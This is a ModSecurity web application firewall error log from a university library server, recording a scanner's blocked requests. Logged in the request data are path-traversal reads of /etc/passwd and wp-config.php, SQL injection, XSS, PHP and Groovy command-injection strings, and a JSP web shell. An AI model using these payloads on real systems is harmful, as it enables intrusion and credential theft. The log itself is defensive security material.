[Tue Aug 29 11:47:19.443616 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAi@TDEAAAAM"]
[Tue Aug 29 11:47:19.519919 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjcHYgAAAAY"]
[Tue Aug 29 11:47:22.385430 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAhT3-wAAAAD"]
[Tue Aug 29 11:47:23.499795 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjKyxsAAAAQ"]
[Tue Aug 29 11:47:25.368187 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhzvrsAAAAx"]
[Tue Aug 29 11:47:25.437059 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAj-eS8AAAAE"]
[Tue Aug 29 11:47:26.427730 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjZRa4AAAAS"]
[Tue Aug 29 11:47:27.407257 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAj115YAAAAa"]
[Tue Aug 29 11:47:31.484216 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAj116YAAAAa"]
[Tue Aug 29 11:47:32.805382 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0J4AAAAi"]
[Tue Aug 29 11:47:34.623008 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9FAAAAAA"]
[Tue Aug 29 11:47:36.830682 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJgAAAAB"]
[Tue Aug 29 11:47:37.439964 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1cAAAAW"]
[Tue Aug 29 11:47:39.416929 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjdQPkAAAAZ"]
[Tue Aug 29 11:47:40.363804 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAkNPmMAAAAI"]
[Tue Aug 29 11:47:40.371436 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAkNPmMAAAAI"]
[Tue Aug 29 11:47:41.393221 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcMAAAAS"]
[Tue Aug 29 11:47:41.402215 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcMAAAAS"]
[Tue Aug 29 11:47:41.680580 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAjW9G0AAAAA"]
[Tue Aug 29 11:47:42.514722 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yKIAAAAN"]
[Tue Aug 29 11:47:43.739148 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAhT4CkAAAAD"]
[Tue Aug 29 11:47:44.419361 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkNPoAAAAAI"]
[Tue Aug 29 11:47:44.497713 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjtc3gAAAAX"]
[Tue Aug 29 11:47:46.510523 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC@UAAAAJ"]
[Tue Aug 29 11:47:47.879337 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAj119YAAAAa"]
[Tue Aug 29 11:47:48.352602 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjrbJsAAAAP"]
[Tue Aug 29 11:47:48.456826 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkdu3YAAAAO"]
[Tue Aug 29 11:47:49.499329 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjL8WsAAAAR"]
[Tue Aug 29 11:47:49.566443 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkAL8wAAAAU"]
[Tue Aug 29 11:47:50.360291 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjCbLYAAAAB"]
[Tue Aug 29 11:47:50.395509 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAhT4C4AAAAD"]
[Tue Aug 29 11:47:50.396949 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkNPooAAAAI"]
[Tue Aug 29 11:47:50.435357 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAhT4DAAAAAD"]
[Tue Aug 29 11:47:51.422365 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAhT4DQAAAAD"]
[Tue Aug 29 11:47:51.440752 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: 